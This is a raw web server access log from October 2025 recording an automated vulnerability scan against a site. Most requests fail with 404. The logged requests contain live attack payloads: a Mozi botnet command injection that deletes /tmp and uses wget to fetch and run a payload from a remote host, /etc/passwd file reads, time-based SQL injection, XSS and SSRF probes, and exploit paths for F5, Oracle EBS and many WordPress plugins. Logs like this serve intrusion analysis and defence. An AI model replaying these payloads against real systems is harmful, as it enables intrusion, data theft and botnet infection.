205.185.122.202 - - [19/Oct/2025:17:10:30 +0530] "GET /34HFRm5zzTM7pUpPfW3Zfcpi90u.txt HTTP/1.1" 404 1056
205.185.122.202 - - [19/Oct/2025:17:10:30 +0530] "GET /34HFRm5zzTM7pUpPfW3Zfcpi90u.txt HTTP/1.1" 404 1056
117.200.80.67 - - [19/Oct/2025:17:10:46 +0530] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://117.200.80.67:47231/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 1012
205.185.122.202 - - [19/Oct/2025:17:12:55 +0530] "POST /apply.cgi HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:17:12:55 +0530] "POST /apply.cgi HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:17:12:56 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:12:56 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:13:00 +0530] "GET /archive/download?file=file:///etc/passwd HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:17:13:00 +0530] "GET /archive/download?file=file:///etc/passwd HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:17:13:38 +0530] "PUT /cgi-bin/hKV5oy.txt HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:17:13:38 +0530] "PUT /cgi-bin/hKV5oy.txt HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:17:13:40 +0530] "PUT /cgi-bin/vgDejT.txt HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:17:13:40 +0530] "PUT /cgi-bin/vgDejT.txt HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:17:13:42 +0530] "GET /cgi-bin/hKV5oy.txt HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:17:13:42 +0530] "GET /cgi-bin/hKV5oy.txt HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:17:13:43 +0530] "POST /wp-admin/admin.php?page=vfb-export HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:17:13:44 +0530] "POST /wp-admin/admin.php?page=vfb-export HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:17:13:44 +0530] "DELETE /cgi-bin/vgDejT.txt HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:17:13:44 +0530] "DELETE /cgi-bin/vgDejT.txt HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:17:14:02 +0530] "GET /images/icons_title.gif HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:17:14:03 +0530] "GET /images/icons_title.gif HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:17:14:06 +0530] "DELETE /images/icons_title.gif HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:17:14:07 +0530] "DELETE /images/icons_title.gif HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:17:14:09 +0530] "GET /images/icons_title.gif HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:17:14:11 +0530] "GET /images/icons_title.gif HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:17:14:58 +0530] "POST /wp-login.php HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:17:14:58 +0530] "POST /wp-login.php HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:17:15:56 +0530] "GET /wp-content/plugins/embed-swagger/readme.txt HTTP/1.1" 404 1080
205.185.122.202 - - [19/Oct/2025:17:15:56 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:17:15:56 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:17:15:57 +0530] "GET /wp-content/plugins/embed-swagger/readme.txt HTTP/1.1" 404 1080
205.185.122.202 - - [19/Oct/2025:17:15:58 +0530] "POST / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:15:58 +0530] "POST / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:15:59 +0530] "POST /?rest_route=/notificationx/v1/analytics HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:15:59 +0530] "POST /?rest_route=/notificationx/v1/analytics HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:16:02 +0530] "GET /?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(7)%20--%20g HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:16:02 +0530] "GET /?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(7)%20--%20g HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:16:03 +0530] "POST /wp-login.php?wlcms-action=preview HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:17:16:04 +0530] "POST /wp-login.php?wlcms-action=preview HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:17:16:06 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:16:06 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:16:07 +0530] "POST null null" 400 -
205.185.122.202 - - [19/Oct/2025:17:16:07 +0530] "POST null null" 400 -
205.185.122.202 - - [19/Oct/2025:17:16:14 +0530] "GET /?p=1&xsg-provider=%3Cimg%20src%20onerror=alert(document.domain)%3E&xsg-format=yyy&xsg-type=zz&xsg-page=pp HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:16:14 +0530] "GET /?p=1&xsg-provider=%3Cimg%20src%20onerror=alert(document.domain)%3E&xsg-format=yyy&xsg-type=zz&xsg-page=pp HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:16:14 +0530] "GET /?rest_route=/pvc/v1/increase/1&post_ids=0)%20union%20select%20md5(999999999),null,null%20--%20g HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:16:14 +0530] "GET /?rest_route=/pvc/v1/increase/1&post_ids=0)%20union%20select%20md5(999999999),null,null%20--%20g HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:16:16 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:17:16:17 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:17:16:18 +0530] "GET /user/login HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:17:16:18 +0530] "GET /user/login HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:17:16:53 +0530] "GET /karma.js HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:17:16:54 +0530] "GET /karma.js HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:17:16:56 +0530] "GET /?return_url=javascript:alert(document.domain) HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:16:57 +0530] "GET /?return_url=javascript:alert(document.domain) HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:16:59 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:16:59 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:17:08 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:17:09 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:17:29 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:17:29 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:18:41 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:18:41 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:19:24 +0530] "GET /wp-json/mapsvg/v1/maps/2?id=1%27%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(6)))b)--+ HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:17:19:25 +0530] "GET /wp-json/mapsvg/v1/maps/2?id=1%27%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(6)))b)--+ HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:17:20:18 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:20:18 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:20:21 +0530] "GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/34HFQoUoaDNp5VK7UWgetotidi2.svg HTTP/1.1" 404 1154
205.185.122.202 - - [19/Oct/2025:17:20:21 +0530] "GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/34HFQoUoaDNp5VK7UWgetotidi2.svg HTTP/1.1" 404 1154
205.185.122.202 - - [19/Oct/2025:17:20:25 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:20:26 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:20:34 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:20:34 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:20:34 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:20:35 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
162.142.125.37 - - [19/Oct/2025:17:20:37 +0530] "-" 400 -
162.142.125.37 - - [19/Oct/2025:17:20:40 +0530] "-" 400 -
162.142.125.37 - - [19/Oct/2025:17:20:55 +0530] "-" 400 -
162.142.125.37 - - [19/Oct/2025:17:20:56 +0530] "-" 400 -
205.185.122.202 - - [19/Oct/2025:17:21:01 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:21:01 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
162.142.125.37 - - [19/Oct/2025:17:21:15 +0530] "-" 400 -
162.142.125.37 - - [19/Oct/2025:17:21:19 +0530] "-" 400 -
205.185.122.202 - - [19/Oct/2025:17:21:37 +0530] "GET /wp-admin/admin-ajax.php?meta_ids=1+AND+(SELECT+3066+FROM+(SELECT(SLEEP(6)))CEHy)&action=remove_post_meta_condition HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:21:38 +0530] "GET /wp-admin/admin-ajax.php?meta_ids=1+AND+(SELECT+3066+FROM+(SELECT(SLEEP(6)))CEHy)&action=remove_post_meta_condition HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:21:53 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:21:55 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:21:56 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:21:56 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:21:59 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:21:59 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:22:01 +0530] "GET /wp-content/plugins/infographic-and-list-builder-ilist/assets/js/ilist_custom_admin.js HTTP/1.1" 404 1164
205.185.122.202 - - [19/Oct/2025:17:22:01 +0530] "GET /wp-content/plugins/infographic-and-list-builder-ilist/assets/js/ilist_custom_admin.js HTTP/1.1" 404 1164
205.185.122.202 - - [19/Oct/2025:17:22:44 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:22:44 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:22:45 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:22:45 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:22:46 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:22:46 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:22:46 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:22:46 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:22:49 +0530] "GET /wp-content/plugins/documentor-lite/core/js/documentor.js HTTP/1.1" 404 1106
205.185.122.202 - - [19/Oct/2025:17:22:50 +0530] "GET /wp-content/plugins/documentor-lite/core/js/documentor.js HTTP/1.1" 404 1106
205.185.122.202 - - [19/Oct/2025:17:23:00 +0530] "GET /wp-admin/admin-ajax.php?action=get_monthly_timetable&month=1+AND+(SELECT+6881+FROM+(SELECT(SLEEP(6)))iEAn) HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:23:00 +0530] "GET /wp-admin/admin-ajax.php?action=get_monthly_timetable&month=1+AND+(SELECT+6881+FROM+(SELECT(SLEEP(6)))iEAn) HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:23:00 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:17:23:00 +0530] "GET null null" 400 -
204.76.203.212 - - [19/Oct/2025:17:23:05 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:23:18 +0530] "GET /index.php?rest_route=/xs-donate-form/payment-redirect/3 HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:17:23:18 +0530] "GET /index.php?rest_route=/xs-donate-form/payment-redirect/3 HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:17:23:20 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:23:20 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:23:27 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:23:27 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:23:29 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:23:30 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:24:00 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:24:01 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:24:22 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:24:23 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:25:01 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:25:01 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:25:53 +0530] "GET /user/login HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:17:25:53 +0530] "GET /user/login HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:17:25:55 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:25:55 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:25:57 +0530] "GET /wp-content/plugins/arprice-responsive-pricing-table/js/arprice.js HTTP/1.1" 404 1124
205.185.122.202 - - [19/Oct/2025:17:25:58 +0530] "GET /wp-content/plugins/arprice-responsive-pricing-table/js/arprice.js HTTP/1.1" 404 1124
205.185.122.202 - - [19/Oct/2025:17:26:10 +0530] "POST /?rest_route=/olistener/new HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:26:10 +0530] "POST /?rest_route=/olistener/new HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:26:12 +0530] "GET /wp-content/plugins/woc-order-alert/assets/admin/js/scripts.js HTTP/1.1" 404 1116
205.185.122.202 - - [19/Oct/2025:17:26:13 +0530] "GET /wp-content/plugins/woc-order-alert/assets/admin/js/scripts.js HTTP/1.1" 404 1116
204.76.203.212 - - [19/Oct/2025:17:26:30 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:26:33 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:26:33 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:26:36 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:26:37 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:26:39 +0530] "GET /wp-content/plugins/stopbadbots/assets/js/stopbadbots.js HTTP/1.1" 404 1104
205.185.122.202 - - [19/Oct/2025:17:26:40 +0530] "POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1" 404 1094
205.185.122.202 - - [19/Oct/2025:17:26:40 +0530] "GET /wp-content/plugins/stopbadbots/assets/js/stopbadbots.js HTTP/1.1" 404 1104
205.185.122.202 - - [19/Oct/2025:17:26:40 +0530] "POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1" 404 1094
205.185.122.202 - - [19/Oct/2025:17:26:42 +0530] "POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1" 404 1094
205.185.122.202 - - [19/Oct/2025:17:26:42 +0530] "POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1" 404 1094
205.185.122.202 - - [19/Oct/2025:17:26:45 +0530] "POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1" 404 1094
205.185.122.202 - - [19/Oct/2025:17:26:46 +0530] "POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1" 404 1094
205.185.122.202 - - [19/Oct/2025:17:26:57 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:26:57 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:26:57 +0530] "POST /wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:26:57 +0530] "POST /wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:27:04 +0530] "POST /ws/km-wsdl/setting/address_book HTTP/1.1" 404 1056
205.185.122.202 - - [19/Oct/2025:17:27:07 +0530] "POST /ws/km-wsdl/setting/address_book HTTP/1.1" 404 1056
205.185.122.202 - - [19/Oct/2025:17:27:17 +0530] "GET /wp-admin/admin-ajax.php?action=vtprd_product_search_ajax&term=aaa%27+union+select+1,sleep(6),3--+- HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:27:18 +0530] "GET /wp-admin/admin-ajax.php?action=vtprd_product_search_ajax&term=aaa%27+union+select+1,sleep(6),3--+- HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:27:30 +0530] "GET /user/login HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:17:27:31 +0530] "GET /user/login HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:17:27:48 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:27:48 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:28:05 +0530] "POST /mgmt/tm/util/bash HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:17:28:05 +0530] "POST /mgmt/tm/util/bash HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:17:28:09 +0530] "POST /mgmt/tm/util/bash HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:17:28:09 +0530] "POST /mgmt/tm/util/bash HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:17:28:16 +0530] "GET /wp-content/plugins/site-offline/readme.txt HTTP/1.1" 404 1078
205.185.122.202 - - [19/Oct/2025:17:28:16 +0530] "GET /wp-content/plugins/site-offline/readme.txt HTTP/1.1" 404 1078
161.35.78.153 - - [19/Oct/2025:17:28:17 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:28:19 +0530] "HEAD /wp-login.php HTTP/1.1" 404 -
205.185.122.202 - - [19/Oct/2025:17:28:19 +0530] "HEAD /wp-login.php HTTP/1.1" 404 -
205.185.122.202 - - [19/Oct/2025:17:28:23 +0530] "GET /wp-json/metform/v1/forms/templates/0 HTTP/1.1" 404 1066
205.185.122.202 - - [19/Oct/2025:17:28:23 +0530] "GET /wp-json/metform/v1/forms/templates/0 HTTP/1.1" 404 1066
205.185.122.202 - - [19/Oct/2025:17:28:30 +0530] "POST /wp-admin/admin.php?page=html2wp-settings HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:17:28:30 +0530] "POST /wp-admin/admin.php?page=html2wp-settings HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:17:28:32 +0530] "GET /wp-content/uploads/html2wp/34HFSJdAiuo4G2bFUjfQBGPCcq4.php HTTP/1.1" 404 1110
205.185.122.202 - - [19/Oct/2025:17:28:33 +0530] "GET /wp-content/uploads/html2wp/34HFSJdAiuo4G2bFUjfQBGPCcq4.php HTTP/1.1" 404 1110
205.185.122.202 - - [19/Oct/2025:17:29:05 +0530] "POST /wp-json/am-member/license HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:17:29:05 +0530] "POST /wp-json/am-member/license HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:17:29:09 +0530] "GET /proxy?url=http%3a//0:8080/ HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:17:29:09 +0530] "GET /proxy?url=http%3a//0:8080/ HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:17:29:10 +0530] "GET /wp-content/plugins/simple-membership/readme.txt HTTP/1.1" 404 1088
205.185.122.202 - - [19/Oct/2025:17:29:10 +0530] "GET /wp-content/plugins/simple-membership/readme.txt HTTP/1.1" 404 1088
205.185.122.202 - - [19/Oct/2025:17:29:13 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:29:16 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:29:17 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:29:19 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:29:52 +0530] "POST /wp-json/rsvpmaker/v1/stripesuccess/anythinghere HTTP/1.1" 404 1088
205.185.122.202 - - [19/Oct/2025:17:29:52 +0530] "POST /wp-json/rsvpmaker/v1/stripesuccess/anythinghere HTTP/1.1" 404 1088
205.185.122.202 - - [19/Oct/2025:17:29:53 +0530] "GET /service/0/test.oast.me HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:17:29:53 +0530] "GET /service/0/test.oast.me HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:17:30:04 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:30:04 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:30:05 +0530] "GET /api/search/attribute?versionid=*&tf_version=%27+and+(select%20pg_sleep(7))+ISNULL-- HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:17:30:06 +0530] "GET /api/search/attribute?versionid=*&tf_version=%27+and+(select%20pg_sleep(7))+ISNULL-- HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:17:30:36 +0530] "GET /wp-admin/admin-ajax.php?action=dprv_log_event&message=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:30:36 +0530] "GET /wp-admin/admin-ajax.php?action=dprv_log_event&message=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:31:02 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:31:02 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:31:27 +0530] "GET .//WEB-INF/weblogic.xml HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:17:31:27 +0530] "GET .//WEB-INF/weblogic.xml HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:17:31:27 +0530] "GET .//WEB-INF/web.xml HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:17:31:27 +0530] "GET .//WEB-INF/web.xml HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:17:31:31 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:31:31 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:31:34 +0530] "GET /wp-admin/admin-ajax.php?action=easync_success_and_save HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:31:35 +0530] "GET /wp-admin/admin-ajax.php?action=easync_success_and_save HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:32:02 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:32:03 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:32:20 +0530] "POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1" 404 1048
205.185.122.202 - - [19/Oct/2025:17:32:20 +0530] "POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1" 404 1048
205.185.122.202 - - [19/Oct/2025:17:32:22 +0530] "GET /OA_CGI/FNDWRR.exe HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:17:32:23 +0530] "GET /OA_CGI/FNDWRR.exe HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:17:32:25 +0530] "POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1" 404 1048
205.185.122.202 - - [19/Oct/2025:17:32:26 +0530] "POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1" 404 1048
205.185.122.202 - - [19/Oct/2025:17:32:36 +0530] "GET /backend/backend/auth/signin HTTP/1.1" 404 1048
205.185.122.202 - - [19/Oct/2025:17:32:37 +0530] "GET /backend/backend/auth/signin HTTP/1.1" 404 1048
205.185.122.202 - - [19/Oct/2025:17:33:14 +0530] "POST /api/login HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:17:33:14 +0530] "POST /api/login HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:17:34:12 +0530] "GET /sap/public/bc/ur/Login/assets/corbu/sap_logo.png HTTP/1.1" 404 1090
205.185.122.202 - - [19/Oct/2025:17:34:12 +0530] "GET /sap/public/bc/ur/Login/assets/corbu/sap_logo.png HTTP/1.1" 404 1090
205.185.122.202 - - [19/Oct/2025:17:34:12 +0530] "GET /sap/admin/public/default.html HTTP/1.1" 404 1052
205.185.122.202 - - [19/Oct/2025:17:34:12 +0530] "GET /sap/admin/public/default.html HTTP/1.1" 404 1052
205.185.122.202 - - [19/Oct/2025:17:34:14 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:34:14 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:34:14 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:34:14 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:34:55 +0530] "GET /modules/appagebuilder/config.xml HTTP/1.1" 404 1058
205.185.122.202 - - [19/Oct/2025:17:34:55 +0530] "GET /vcac/ HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:17:34:56 +0530] "GET /vcac/ HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:17:34:57 +0530] "GET /modules/appagebuilder/config.xml HTTP/1.1" 404 1058
